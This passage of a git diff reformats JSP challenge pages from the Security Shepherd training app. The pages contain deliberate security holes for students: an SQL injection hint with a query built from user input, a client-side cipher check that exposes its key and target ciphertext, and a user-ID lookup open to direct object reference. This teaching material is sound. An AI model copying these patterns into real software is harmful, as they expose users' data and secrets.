-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <div id="hint" style="display: none;">
-        <h2 class="title"><%= bundle.getString("challenge.hint") %>
-        </h2>
-        <%= bundle.getString("challenge.hint.description") %>
-        <br/> <br/>
-        <div>
-            SELECT * FROM customers WHERE customerAddress ='<a id="userContent"></a>';
-        </div>
-        <br/> <br/>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<div id="hint" style="display: none;">
+			<h2 class="title"><%= bundle.getString("challenge.hint") %></h2>
+			<%= bundle.getString("challenge.hint.description") %>
+			<br /> <br />
+			<div>
+				SELECT * FROM customers WHERE customerAddress ='<a id="userContent"></a>';
+			</div>
+			<br /> <br />
+		</div>
 
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.pleaseEnter") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="userIdentity" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.button.value") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.pleaseEnter") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="userIdentity" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.button.value") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#userContent").text($("#userIdentity").val());
-        var theName = $("#userIdentity").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b",
-                data: {
-                    userIdentity: theName
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                    if (counter == 3) {
-                        $("#hintButton").show("slow");
-                    }
-                });
-            });
-        });
-    });
-    $("#userIdentity").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#userContent").text($("#userIdentity").val());
+				var theName = $("#userIdentity").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "ffd39cb26727f34cbf9fce3e82b9d703404e99cdef54d2aa745f497abe070b",
+						data: {
+							userIdentity: theName
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+							if (counter == 3)
+							{
+								$("#hintButton").show("slow");
+							}
+						});
+					});
+				});
+			});
+			$("#userIdentity").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/h8aa0fdc145fb8089661997214cc0e685e5f86a87f30c2ca641e1dde15b01177.jsp b/src/main/webapp/challenges/h8aa0fdc145fb8089661997214cc0e685e5f86a87f30c2ca641e1dde15b01177.jsp
index 9f845f86f..f6b0d2fcf 100644
--- a/src/main/webapp/challenges/h8aa0fdc145fb8089661997214cc0e685e5f86a87f30c2ca641e1dde15b01177.jsp
+++ b/src/main/webapp/challenges/h8aa0fdc145fb8089661997214cc0e685e5f86a87f30c2ca641e1dde15b01177.jsp
@@ -1,157 +1,166 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Insecure Cryptographic Storage Challenge 2
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * Insecure Cryptographic Storage Challenge 2
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "Insecure Cryptographic Storage Challenge 2";
-
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoStorage", locale);
-    //Used more than once translations
-    String i18nLevelName = bundle.getString("insecureCryptoStorage.2.challengename");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+String levelName = "Insecure Cryptographic Storage Challenge 2";
+ 
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoStorage", locale);
+ //Used more than once translations
+ String i18nLevelName = bundle.getString("insecureCryptoStorage.2.challengename");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("insecureCryptoStorage.2.whatToDo") %>
-        <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><input type="text" id="resultKeyAttempt"
-                           style="width: 300px;"/></
-                ><input type="submit"
-                        value="<%= bundle.getString("insecureCryptoStorage.2.checkKey") %>"/>
-                </td>
-            </tr>
-        </table>
-    </form>
-    <br/> <br/>
-    <div id="resultDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        // <%= bundle.getString("insecureCryptoStorage.2.hint") %>
-        var input = $("#resultKeyAttempt").val();
-        theKey = "kpoisaijdieyjaf";
-        var theAlphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz";
-
-        // <%= bundle.getString("insecureCryptoStorage.2.commentedCode.1") %>
-        theKey = theKey.toUpperCase();
-        var theKeysLength = theKey.length;
-        var i;
-        var adjustedKey = "";
-        for (i = 0; i < theKeysLength; i++) {
-            var currentKeyChar = theAlphabet.indexOf(theKey.charAt(i));
-            if (currentKeyChar < 0)
-                continue;
-            adjustedKey += theAlphabet.charAt(currentKeyChar);
-        }
-        theKey = adjustedKey;
-        theKeysLength = theKey.length;
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("insecureCryptoStorage.2.whatToDo") %>
+			<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><input type="text" id="resultKeyAttempt"
+						style="width: 300px;" /></><input type="submit"
+						value="<%= bundle.getString("insecureCryptoStorage.2.checkKey") %>" />
+					</td>
+				</tr>
+			</table>
+		</form>
+		<br /> <br />
+		<div id="resultDiv"></div>
+		</p>
+	</div>
+	<script>			
+		$("#leForm").submit(function(){
+			// <%= bundle.getString("insecureCryptoStorage.2.hint") %>
+			var input = $("#resultKeyAttempt").val();
+			theKey = "kpoisaijdieyjaf";
+			var theAlphabet =   "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz";
 
-        // <%= bundle.getString("insecureCryptoStorage.2.commentedCode.2") %>
-        var inputLength = input.length;
-        var output = "";
-        var theKeysCurrentIndex = 0;
-        for (i = 0; i < inputLength; i++) {
-            var currentChar = input.charAt(i);
-            var currentCharValue = theAlphabet.indexOf(currentChar);
-            if (currentCharValue < 0) {
-                output += currentChar;
-                continue;
-            }
-            var lowercase = currentCharValue >= 26 ? true : false;
-            currentCharValue += theAlphabet.indexOf(theKey.charAt(theKeysCurrentIndex));
-            currentCharValue += 26;
-            if (lowercase)
-                currentCharValue = currentCharValue % 26 + 26;
-            else
-                currentCharValue %= 26;
-            output += theAlphabet.charAt(currentCharValue);
-            theKeysCurrentIndex = (theKeysCurrentIndex + 1) % theKeysLength;
-        }
+			// <%= bundle.getString("insecureCryptoStorage.2.commentedCode.1") %>
+			theKey = theKey.toUpperCase();
+			var theKeysLength = theKey.length;
+			var i;
+			var adjustedKey = "";
+			for(i = 0; i < theKeysLength; i ++)
+			{
+				var currentKeyChar = theAlphabet.indexOf(theKey.charAt(i));
+				if(currentKeyChar < 0)
+					continue;
+				adjustedKey += theAlphabet.charAt(currentKeyChar);
+			}
+			theKey = adjustedKey;
+			theKeysLength = theKey.length;
 
-        // <%= bundle.getString("insecureCryptoStorage.2.commentedCode.3") %>
-        $("#resultDiv").hide("fast", function () {
-            if (output == "DwsDagmwhziArpmogWaSmmckwhMoEsmgmxlivpDttfjbjdxqBwxbKbCwgwgUyam")
-                $('#resultDiv').html("<p>Yeah, that's correct</p>");
-            else
-                $('#resultDiv').html("<p>No, that's not correct</p>");
-            $("#resultDiv").show("slow");
-        });
-        // <%= bundle.getString("insecureCryptoStorage.2.commentedCode.4") %>
-        /*
-        $("#resultDiv").hide("fast", function(){
-                $('#resultDiv').html("Encrypted Output: " + output);
-            $("#resultDiv").show("slow");
-        });
-        */
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+			// <%= bundle.getString("insecureCryptoStorage.2.commentedCode.2") %>
+			var inputLength = input.length;
+			var output = "";
+			var theKeysCurrentIndex = 0;
+			for(i = 0; i < inputLength; i ++)
+			{
+				var currentChar = input.charAt(i);
+				var currentCharValue = theAlphabet.indexOf(currentChar);
+				if(currentCharValue < 0)
+				{
+					output += currentChar;
+					continue;
+				}
+				var lowercase = currentCharValue >= 26 ? true : false;
+				currentCharValue += theAlphabet.indexOf(theKey.charAt(theKeysCurrentIndex));
+				currentCharValue += 26;
+				if(lowercase)
+					currentCharValue = currentCharValue % 26 + 26;
+				else
+					currentCharValue %= 26;
+				output += theAlphabet.charAt(currentCharValue);
+				theKeysCurrentIndex =(theKeysCurrentIndex + 1) % theKeysLength;
+			}
+			
+			// <%= bundle.getString("insecureCryptoStorage.2.commentedCode.3") %>
+			$("#resultDiv").hide("fast", function(){
+				if(output == "DwsDagmwhziArpmogWaSmmckwhMoEsmgmxlivpDttfjbjdxqBwxbKbCwgwgUyam")
+					$('#resultDiv').html("<p>Yeah, that's correct</p>");
+				else
+					$('#resultDiv').html("<p>No, that's not correct</p>");
+				$("#resultDiv").show("slow");
+			});
+			// <%= bundle.getString("insecureCryptoStorage.2.commentedCode.4") %>
+			/*
+			$("#resultDiv").hide("fast", function(){
+					$('#resultDiv').html("Encrypted Output: " + output);
+				$("#resultDiv").show("slow");
+			});
+			*/
+		});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.jsp b/src/main/webapp/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.jsp
index 1e36e7803..d8285d86c 100644
--- a/src/main/webapp/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.jsp
+++ b/src/main/webapp/challenges/o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c.jsp
@@ -1,145 +1,153 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Insecure Direct Object References Challenge One
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-
-    String levelName = "Insecure Direct Object References Challenge One";
-    String levelHash = "o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c";
+/**
+ * Insecure Direct Object References Challenge One
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
+ String levelName = "Insecure Direct Object References Challenge One";
+ String levelHash = "o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c";
+ 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.directObject." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.directObject." + levelHash, locale);
 //Used more than once translations
-    String i18nChallengeName = bundle.getString("challenge.challengeName");
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            String ApplicationRoot = getServletContext().getRealPath("");
+String i18nChallengeName = bundle.getString("challenge.challengeName");
+	
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		String ApplicationRoot = getServletContext().getRealPath("");
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nChallengeName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nChallengeName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nChallengeName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.whatToDo") %>
-        <br/> <br/>
-        <center>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                </td>
-                <select id='userId' style='width: 300px;' multiple>
-                    <option value="1">Paul Bourke</option>
-                    <option value="3">Will Bailey</option>
-                    <option value="5">Orla Cleary</option>
-                    <option value="7">Ronan Fitzpatrick</option>
-                    <option value="9">Pat McKenana</option>
-                </select>
-                </td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input style='width: 300px;' type="submit"
-                               value="<%= bundle.getString("challenge.showProfile") %>"/>
-                    </div>
-                    <p style="display: none; text-align: center;"
-                       id="loadingSign"><%= bundle.getString("challenge.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-    </center>
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var optionValue = $("#userId").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    userId: optionValue
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nChallengeName %></h2>
+		<p>
+			<%= bundle.getString("challenge.whatToDo") %>
+			<br /> <br />
+		<center>
+			<form id="leForm" action="javascript:;">
+				<table>
+					<tr>
+						</td>
+						<select id='userId' style='width: 300px;' multiple>
+							<option value="1">Paul Bourke</option>
+							<option value="3">Will Bailey</option>
+							<option value="5">Orla Cleary</option>
+							<option value="7">Ronan Fitzpatrick</option>
+							<option value="9">Pat McKenana</option>
+						</select>
+						</td>
+					</tr>
+					<tr>
+						<td>
+							<div id="submitButton">
+								<input style='width: 300px;' type="submit"
+									value="<%= bundle.getString("challenge.showProfile") %>" />
+							</div>
+							<p style="display: none; text-align: center;" id="loadingSign"><%= bundle.getString("challenge.loading") %></p>
+						</td>
+					</tr>
+				</table>
+			</form>
+		</center>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var optionValue = $("#userId").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							userId: optionValue
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52.jsp b/src/main/webapp/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52.jsp
index 174aa8bb6..69f859774 100644
--- a/src/main/webapp/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52.jsp
+++ b/src/main/webapp/challenges/s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52.jsp
@@ -1,180 +1,185 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Cross Site Request Forgery Challenge 1
-     *
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-
-    String levelName = new String("CSRF Challenge 1");
-    String levelHash = new String("s74a796e84e25b854906d88f622170c1c06817e72b526b3d1e9a6085f429cf52");
-
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
-
